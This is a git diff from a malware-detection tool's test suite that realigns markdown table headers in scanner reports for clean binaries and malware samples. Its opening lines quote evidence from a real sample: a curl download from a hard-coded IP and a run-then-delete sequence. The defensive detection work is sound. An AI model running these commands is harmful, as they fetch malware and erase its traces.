 | CRITICAL | [evasion/self_deletion/run_and_delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/self_deletion/run_and_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)<br>[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)<br>[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)<br>[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)<br>[sleep 3](https://github.com/search?q=sleep+3&type=code) |
 | CRITICAL | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_download_ip) | Invokes curl to download a file from an IP | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o&type=code) |
diff --git a/tests/linux/UPX/06ed158.md b/tests/linux/UPX/06ed158.md
index ae6790ef5..b993ef244 100644
--- a/tests/linux/UPX/06ed158.md
+++ b/tests/linux/UPX/06ed158.md
@@ -1,7 +1,7 @@
 ## linux/UPX/06ed158 [😈 CRITICAL]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | HIGH | [anti-static/elf/content](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/content.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | |
 | HIGH | [anti-static/elf/entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/entropy.yara#normal_elf_high_entropy_7_4) | high entropy footer in ELF binary (>7.4) | |
 | HIGH | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#high_entropy_header) | high entropy ELF header (>7) | |
diff --git a/tests/linux/clean/code-oss.md b/tests/linux/clean/code-oss.md
index 0717d207a..1aa125ec1 100644
--- a/tests/linux/clean/code-oss.md
+++ b/tests/linux/clean/code-oss.md
@@ -1,7 +1,7 @@
 ## linux/clean/code-oss [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | MEDIUM | [anti-behavior/LD_DEBUG](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_DEBUG.yara#env_LD_DEBUG) | may check if dynamic linker debugging is enabled | [LD_DEBUG](https://github.com/search?q=LD_DEBUG&type=code) |
 | MEDIUM | [anti-behavior/LD_PROFILE](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_PROFILE.yara#env_LD_PROFILE) | may check if dynamic linker profiling is enabled | [LD_PROFILE](https://github.com/search?q=LD_PROFILE&type=code) |
 | MEDIUM | [anti-behavior/vm_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/vm-check.yara#vm_checker) | Checks to see if it is running with a VM | [GenuineIntel](https://github.com/search?q=GenuineIntel&type=code)<br>[VMware](https://github.com/search?q=VMware&type=code) |
diff --git a/tests/linux/clean/cpack.md b/tests/linux/clean/cpack.md
index 5794c73a7..caf2ce678 100644
--- a/tests/linux/clean/cpack.md
+++ b/tests/linux/clean/cpack.md
@@ -1,7 +1,7 @@
 ## linux/clean/cpack [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` |
 | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [local_ip](https://github.com/search?q=local_ip&type=code)<br>[use_port](https://github.com/search?q=use_port&type=code)<br>[Port](https://github.com/search?q=Port&type=code)<br>[Ip](https://github.com/search?q=Ip&type=code)<br>[IP](https://github.com/search?q=IP&type=code) |
 | MEDIUM | [c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID) | contains a client ID | [clientID](https://github.com/search?q=clientID&type=code) |
diff --git a/tests/linux/clean/ls.x86_64.md b/tests/linux/clean/ls.x86_64.md
index eb7d72c0d..e2d48ee2d 100644
--- a/tests/linux/clean/ls.x86_64.md
+++ b/tests/linux/clean/ls.x86_64.md
@@ -1,7 +1,7 @@
 ## linux/clean/ls.x86_64 [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) |
 | LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)<br>[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/)<br>[https://translationproject.org/team/](https://translationproject.org/team/)<br>[https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html) |
 | LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)<br>[x86](https://github.com/search?q=x86&type=code) |
diff --git a/tests/linux/clean/lslogins.md b/tests/linux/clean/lslogins.md
index cc8ae37c6..834b8e910 100644
--- a/tests/linux/clean/lslogins.md
+++ b/tests/linux/clean/lslogins.md
@@ -1,7 +1,7 @@
 ## linux/clean/lslogins [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) |
 | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
 | MEDIUM | [evasion/logging/current_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/current_logins.yara#current_logins) | accesses current logins | [/var/log/wtmp](https://github.com/search?q=%2Fvar%2Flog%2Fwtmp&type=code) |
diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md
index c8a55bbd8..5eeb8aae4 100644
--- a/tests/linux/clean/pandoc.md
+++ b/tests/linux/clean/pandoc.md
@@ -1,7 +1,7 @@
 ## linux/clean/pandoc [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` |
 | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [curlopt_port](https://github.com/search?q=curlopt_port&type=code)<br>[primary_port](https://github.com/search?q=primary_port&type=code)<br>[internal_ip](https://github.com/search?q=internal_ip&type=code)<br>[lnormhet_ip](https://github.com/search?q=lnormhet_ip&type=code)<br>[defaultPort](https://github.com/search?q=defaultPort&type=code)<br>[radius_port](https://github.com/search?q=radius_port&type=code)<br>[domain_port](https://github.com/search?q=domain_port&type=code)<br>[config_port](https://github.com/search?q=config_port&type=code)<br>[client_port](https://github.com/search?q=client_port&type=code)<br>[server_port](https://github.com/search?q=server_port&type=code)<br>[validate_ip](https://github.com/search?q=validate_ip&type=code)<br>[lloghet_ip](https://github.com/search?q=lloghet_ip&type=code)<br>[serverPort](https://github.com/search?q=serverPort&type=code)<br>[socketPort](https://github.com/search?q=socketPort&type=code)<br>[weibhet_ip](https://github.com/search?q=weibhet_ip&type=code)<br>[ipproto_ip](https://github.com/search?q=ipproto_ip&type=code)<br>[ereghet_ip](https://github.com/search?q=ereghet_ip&type=code)<br>[gomphet_ip](https://github.com/search?q=gomphet_ip&type=code)<br>[primary_ip](https://github.com/search?q=primary_ip&type=code)<br>[local_port](https://github.com/search?q=local_port&type=code)<br>[framed_ip](https://github.com/search?q=framed_ip&type=code)<br>[gamhet_ip](https://github.com/search?q=gamhet_ip&type=code)<br>[client_ip](https://github.com/search?q=client_ip&type=code)<br>[open_port](https://github.com/search?q=open_port&type=code)<br>[http_port](https://github.com/search?q=http_port&type=code)<br>[proxyPort](https://github.com/search?q=proxyPort&type=code)<br>[login_ip](https://github.com/search?q=login_ip&type=code)<br>[get_port](https://github.com/search?q=get_port&type=code)<br>[nas_port](https://github.com/search?q=nas_port&type=code)<br>[tcp_port](https://github.com/search?q=tcp_port&type=code)<br>[sam_port](https://github.com/search?q=sam_port&type=code)<br>[lat_port](https://github.com/search?q=lat_port&type=code)<br>[url_port](https://github.com/search?q=url_port&type=code)<br>[local_ip](https://github.com/search?q=local_ip&type=code)<br>[bindPort](https://github.com/search?q=bindPort&type=code)<br>[ftp_port](https://github.com/search?q=ftp_port&type=code)<br>[uriPort](https://github.com/search?q=uriPort&type=code)<br>[host_ip](https://github.com/search?q=host_ip&type=code)<br>[setPort](https://github.com/search?q=setPort&type=code)<br>[getPort](https://github.com/search?q=getPort&type=code)<br>[pg_port](https://github.com/search?q=pg_port&type=code)<br>[is_port](https://github.com/search?q=is_port&type=code)<br>[nas_ip](https://github.com/search?q=nas_ip&type=code)<br>[blIp](https://github.com/search?q=blIp&type=code)<br>[mIp](https://github.com/search?q=mIp&type=code)<br>[xIp](https://github.com/search?q=xIp&type=code)<br>[eIp](https://github.com/search?q=eIp&type=code)<br>[IP](https://github.com/search?q=IP&type=code) |
 | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [inet_server_addr](https://github.com/search?q=inet_server_addr&type=code) |
diff --git a/tests/linux/clean/ping.x86_64.md b/tests/linux/clean/ping.x86_64.md
index d9e6c0a59..ec993fe70 100644
--- a/tests/linux/clean/ping.x86_64.md
+++ b/tests/linux/clean/ping.x86_64.md
@@ -1,7 +1,7 @@
 ## linux/clean/ping.x86_64 [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [Port](https://github.com/search?q=Port&type=code)<br>[IP](https://github.com/search?q=IP&type=code) |
 | MEDIUM | [discover/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/multiple.yara#sys_net_recon) | collects system and network information | [ipv6=addr](https://github.com/search?q=ipv6%3Daddr&type=code)<br>[ipv4=addr](https://github.com/search?q=ipv4%3Daddr&type=code)<br>[id](https://github.com/search?q=id&type=code) |
 | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)<br>[getifaddrs](https://github.com/search?q=getifaddrs&type=code) |
diff --git a/tests/linux/clean/qemu-system-xtensa.md b/tests/linux/clean/qemu-system-xtensa.md
index 8b773f855..a7669e6db 100644
--- a/tests/linux/clean/qemu-system-xtensa.md
+++ b/tests/linux/clean/qemu-system-xtensa.md
@@ -1,7 +1,7 @@
 ## linux/clean/qemu-system-xtensa [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` |
 | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [throttle_port](https://github.com/search?q=throttle_port&type=code)<br>[upstream_port](https://github.com/search?q=upstream_port&type=code)<br>[register_port](https://github.com/search?q=register_port&type=code)<br>[virtser_port](https://github.com/search?q=virtser_port&type=code)<br>[megasas_port](https://github.com/search?q=megasas_port&type=code)<br>[release_port](https://github.com/search?q=release_port&type=code)<br>[message_port](https://github.com/search?q=message_port&type=code)<br>[serial_port](https://github.com/search?q=serial_port&type=code)<br>[handle_port](https://github.com/search?q=handle_port&type=code)<br>[mptsas_port](https://github.com/search?q=mptsas_port&type=code)<br>[remove_port](https://github.com/search?q=remove_port&type=code)<br>[metadata_ip](https://github.com/search?q=metadata_ip&type=code)<br>[claim_port](https://github.com/search?q=claim_port&type=code)<br>[reset_port](https://github.com/search?q=reset_port&type=code)<br>[clear_port](https://github.com/search?q=clear_port&type=code)<br>[write_port](https://github.com/search?q=write_port&type=code)<br>[compare_ip](https://github.com/search?q=compare_ip&type=code)<br>[state_port](https://github.com/search?q=state_port&type=code)<br>[extract_ip](https://github.com/search?q=extract_ip&type=code)<br>[ohci_port](https://github.com/search?q=ohci_port&type=code)<br>[xhci_port](https://github.com/search?q=xhci_port&type=code)<br>[pcie_port](https://github.com/search?q=pcie_port&type=code)<br>[host_port](https://github.com/search?q=host_port&type=code)<br>[ahci_port](https://github.com/search?q=ahci_port&type=code)<br>[find_port](https://github.com/search?q=find_port&type=code)<br>[mmio_port](https://github.com/search?q=mmio_port&type=code)<br>[ehci_port](https://github.com/search?q=ehci_port&type=code)<br>[spdm_port](https://github.com/search?q=spdm_port&type=code)<br>[update_ip](https://github.com/search?q=update_ip&type=code)<br>[uhci_port](https://github.com/search?q=uhci_port&type=code)<br>[usb_port](https://github.com/search?q=usb_port&type=code)<br>[fix_port](https://github.com/search?q=fix_port&type=code)<br>[get_port](https://github.com/search?q=get_port&type=code)<br>[mem_port](https://github.com/search?q=mem_port&type=code)<br>[hub_port](https://github.com/search?q=hub_port&type=code)<br>[add_port](https://github.com/search?q=add_port&type=code)<br>[and_port](https://github.com/search?q=and_port&type=code)<br>[be_port](https://github.com/search?q=be_port&type=code)<br>[get_ip](https://github.com/search?q=get_ip&type=code)<br>[Port](https://github.com/search?q=Port&type=code)<br>[IP](https://github.com/search?q=IP&type=code)<br>[Ip](https://github.com/search?q=Ip&type=code) |
 | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) |
diff --git a/tests/linux/clean/redis-server.aarch64.md b/tests/linux/clean/redis-server.aarch64.md
index 26b1e614d..1b763dcc3 100644
--- a/tests/linux/clean/redis-server.aarch64.md
+++ b/tests/linux/clean/redis-server.aarch64.md
@@ -1,7 +1,7 @@
 ## linux/clean/redis-server.aarch64 [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [master_port](https://github.com/search?q=master_port&type=code)<br>[updatePort](https://github.com/search?q=updatePort&type=code)<br>[host_port](https://github.com/search?q=host_port&type=code)<br>[tcp_port](https://github.com/search?q=tcp_port&type=code)<br>[bus_port](https://github.com/search?q=bus_port&type=code)<br>[prev_ip](https://github.com/search?q=prev_ip&type=code)<br>[IP](https://github.com/search?q=IP&type=code) |
 | MEDIUM | [crypto/openssl](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/openssl.yara#openssl_user) | Uses OpenSSL | [OpenSSL](https://github.com/search?q=OpenSSL&type=code) |
 | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) |
diff --git a/tests/linux/clean/slack.md b/tests/linux/clean/slack.md
index 8f526acfe..f329a66f9 100644
--- a/tests/linux/clean/slack.md
+++ b/tests/linux/clean/slack.md
@@ -1,7 +1,7 @@
 ## linux/clean/slack [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | MEDIUM | [anti-behavior/LD_DEBUG](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_DEBUG.yara#env_LD_DEBUG) | may check if dynamic linker debugging is enabled | [LD_DEBUG](https://github.com/search?q=LD_DEBUG&type=code) |
 | MEDIUM | [anti-behavior/LD_PROFILE](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_PROFILE.yara#env_LD_PROFILE) | may check if dynamic linker profiling is enabled | [LD_PROFILE](https://github.com/search?q=LD_PROFILE&type=code) |
 | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` |
diff --git a/tests/linux/clean/tree-sitter.md b/tests/linux/clean/tree-sitter.md
index 55067dd5c..d9151254c 100644
--- a/tests/linux/clean/tree-sitter.md
+++ b/tests/linux/clean/tree-sitter.md
@@ -1,7 +1,7 @@
 ## linux/clean/tree-sitter [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` |
 | MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References a 'dropper' | [Dropper](https://github.com/search?q=Dropper&type=code) |
 | MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)<br>[windows](https://github.com/search?q=windows&type=code)<br>[Windows](https://github.com/search?q=Windows&type=code)<br>[http://](http://)<br>[Darwin](https://github.com/search?q=Darwin&type=code)<br>[darwin](https://github.com/search?q=darwin&type=code)<br>[linux](https://github.com/search?q=linux&type=code)<br>[macOS](https://github.com/search?q=macOS&type=code)<br>[macos](https://github.com/search?q=macos&type=code) |
diff --git a/tests/linux/clean/trufflehog.md b/tests/linux/clean/trufflehog.md
index 09a90e0ea..a688d4310 100644
--- a/tests/linux/clean/trufflehog.md
+++ b/tests/linux/clean/trufflehog.md
@@ -1,7 +1,7 @@
 ## linux/clean/trufflehog [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | MEDIUM | [anti-behavior/vm_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/vm-check.yara#vm_checker) | Checks to see if it is running with a VM | [GenuineIntel](https://github.com/search?q=GenuineIntel&type=code)<br>[VMware](https://github.com/search?q=VMware&type=code) |
 | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` |
 | MEDIUM | [anti-static/obfuscation/syscall](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/syscall.yara#go_raw_syscall) | invokes raw system calls | [unix.RawSyscall](https://github.com/search?q=unix.RawSyscall&type=code) |
diff --git a/tests/linux/clean/viewgam.md b/tests/linux/clean/viewgam.md
index cc0703928..a8a13d149 100644
--- a/tests/linux/clean/viewgam.md
+++ b/tests/linux/clean/viewgam.md
@@ -1,7 +1,7 @@
 ## linux/clean/viewgam [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)<br>[http://](http://)<br>[windows](https://github.com/search?q=windows&type=code)<br>[linux](https://github.com/search?q=linux&type=code) |
 | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code)<br>[<html>](https://github.com/search?q=%3Chtml%3E&type=code) |
 | MEDIUM | [data/encoding/int](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/int.yara#js_parseInt_Math) | performs math directly against parsed integers | [+parseInt(](https://github.com/search?q=%2BparseInt%28&type=code) |
diff --git a/tests/linux/clean/zipdetails.md b/tests/linux/clean/zipdetails.md
index 00cf228d8..81b0b71db 100644
--- a/tests/linux/clean/zipdetails.md
+++ b/tests/linux/clean/zipdetails.md
@@ -1,7 +1,7 @@
 ## linux/clean/zipdetails [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#excessive_hex_refs) | many references to hexadecimal values | [0x10000000](https://github.com/search?q=0x10000000&type=code)<br>[0x08074b50](https://github.com/search?q=0x08074b50&type=code)<br>[0x02014b50](https://github.com/search?q=0x02014b50&type=code)<br>[0x06054b50](https://github.com/search?q=0x06054b50&type=code)<br>[0x06064b50](https://github.com/search?q=0x06064b50&type=code)<br>[0x07064b50](https://github.com/search?q=0x07064b50&type=code)<br>[0x08064b50](https://github.com/search?q=0x08064b50&type=code)<br>[0x05054b50](https://github.com/search?q=0x05054b50&type=code)<br>[0xE9F3F9F0](https://github.com/search?q=0xE9F3F9F0&type=code)<br>[0x7109871a](https://github.com/search?q=0x7109871a&type=code)<br>[0xf05368c0](https://github.com/search?q=0xf05368c0&type=code)<br>[0x04034b50](https://github.com/search?q=0x04034b50&type=code)<br>[0x19DB1DED](https://github.com/search?q=0x19DB1DED&type=code)<br>[0xFFFFFFFF](https://github.com/search?q=0xFFFFFFFF&type=code)<br>[0x2146444e](https://github.com/search?q=0x2146444e&type=code)<br>[0xff3b5998](https://github.com/search?q=0xff3b5998&type=code)<br>[0x71777777](https://github.com/search?q=0x71777777&type=code)<br>[0x504b4453](https://github.com/search?q=0x504b4453&type=code)<br>[0x6dff800d](https://github.com/search?q=0x6dff800d&type=code)<br>[0x42726577](https://github.com/search?q=0x42726577&type=code)<br>[0x0065](https://github.com/search?q=0x0065&type=code)<br>[0x7FFF](https://github.com/search?q=0x7FFF&type=code)<br>[0x4154](https://github.com/search?q=0x4154&type=code)<br>[0x4341](https://github.com/search?q=0x4341&type=code)<br>[0x4453](https://github.com/search?q=0x4453&type=code)<br>[0x4690](https://github.com/search?q=0x4690&type=code)<br>[0x4704](https://github.com/search?q=0x4704&type=code)<br>[0x470f](https://github.com/search?q=0x470f&type=code)<br>[0x4854](https://github.com/search?q=0x4854&type=code)<br>[0x4b46](https://github.com/search?q=0x4b46&type=code)<br>[0x4c41](https://github.com/search?q=0x4c41&type=code)<br>[0x4d49](https://github.com/search?q=0x4d49&type=code)<br>[0x4d63](https://github.com/search?q=0x4d63&type=code)<br>[0x4f4c](https://github.com/search?q=0x4f4c&type=code)<br>[0x5356](https://github.com/search?q=0x5356&type=code)<br>[0x5455](https://github.com/search?q=0x5455&type=code)<br>[0x554e](https://github.com/search?q=0x554e&type=code)<br>[0x5855](https://github.com/search?q=0x5855&type=code)<br>[0x5a4c](https://github.com/search?q=0x5a4c&type=code)<br>[0x5a4d](https://github.com/search?q=0x5a4d&type=code)<br>[0x6375](https://github.com/search?q=0x6375&type=code)<br>[0x6542](https://github.com/search?q=0x6542&type=code)<br>[0x6854](https://github.com/search?q=0x6854&type=code)<br>[0x7075](https://github.com/search?q=0x7075&type=code)<br>[0x756e](https://github.com/search?q=0x756e&type=code)<br>[0x7441](https://github.com/search?q=0x7441&type=code)<br>[0x7855](https://github.com/search?q=0x7855&type=code)<br>[0x7875](https://github.com/search?q=0x7875&type=code)<br>[0x9901](https://github.com/search?q=0x9901&type=code)<br>[0xa11e](https://github.com/search?q=0xa11e&type=code)<br>[0xA220](https://github.com/search?q=0xA220&type=code)<br>[0xCAFE](https://github.com/search?q=0xCAFE&type=code)<br>[0xfb4a](https://github.com/search?q=0xfb4a&type=code)<br>[0x0001](https://github.com/search?q=0x0001&type=code)<br>[0x0007](https://github.com/search?q=0x0007&type=code)<br>[0x0008](https://github.com/search?q=0x0008&type=code)<br>[0x0009](https://github.com/search?q=0x0009&type=code)<br>[0x000a](https://github.com/search?q=0x000a&type=code)<br>[0x2805](https://github.com/search?q=0x2805&type=code)<br>[0x8000](https://github.com/search?q=0x8000&type=code)<br>[0x334d](https://github.com/search?q=0x334d&type=code)<br>[0x2705](https://github.com/search?q=0x2705&type=code)<br>[0x2605](https://github.com/search?q=0x2605&type=code)<br>[0x07c8](https://github.com/search?q=0x07c8&type=code)<br>[0x0066](https://github.com/search?q=0x0066&type=code)<br>[0x0023](https://github.com/search?q=0x0023&type=code)<br>[0x0022](https://github.com/search?q=0x0022&type=code)<br>[0x0021](https://github.com/search?q=0x0021&type=code)<br>[0x0020](https://github.com/search?q=0x0020&type=code)<br>[0x0019](https://github.com/search?q=0x0019&type=code)<br>[0x0018](https://github.com/search?q=0x0018&type=code)<br>[0x0017](https://github.com/search?q=0x0017&type=code)<br>[0x0016](https://github.com/search?q=0x0016&type=code)<br>[0x000c](https://github.com/search?q=0x000c&type=code)<br>[0x000d](https://github.com/search?q=0x000d&type=code)<br>[0x000e](https://github.com/search?q=0x000e&type=code)<br>[0x000f](https://github.com/search?q=0x000f&type=code)<br>[0x0014](https://github.com/search?q=0x0014&type=code)<br>[0x0015](https://github.com/search?q=0x0015&type=code)<br>[0x01](https://github.com/search?q=0x01&type=code)<br>[0x1f](https://github.com/search?q=0x1f&type=code)<br>[0x0f](https://github.com/search?q=0x0f&type=code)<br>[0x7f](https://github.com/search?q=0x7f&type=code)<br>[0x03](https://github.com/search?q=0x03&type=code)<br>[0x20](https://github.com/search?q=0x20&type=code)<br>[0x3e](https://github.com/search?q=0x3e&type=code)<br>[0x3f](https://github.com/search?q=0x3f&type=code)<br>[\x00](https://github.com/search?q=%5Cx00&type=code)<br>[\x01](https://github.com/search?q=%5Cx01&type=code) |
 | MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)<br>[http://](http://)<br>[Windows](https://github.com/search?q=Windows&type=code)<br>[Darwin](https://github.com/search?q=Darwin&type=code)<br>[linux](https://github.com/search?q=linux&type=code) |
 | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [zip files](https://github.com/search?q=zip+files&type=code)<br>[zipfile](https://github.com/search?q=zipfile&type=code)<br>[ZIP64](https://github.com/search?q=ZIP64&type=code) |
diff --git a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff
index e33d81296..1f83074a3 100644
--- a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff
@@ -3,7 +3,7 @@
 ### 22 removed behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | -CRITICAL | [3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16) | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) |
 | -CRITICAL | [3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275) | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)<br>`$sa1`<br>`$sa2`<br>`$op1`<br>`$op2` |
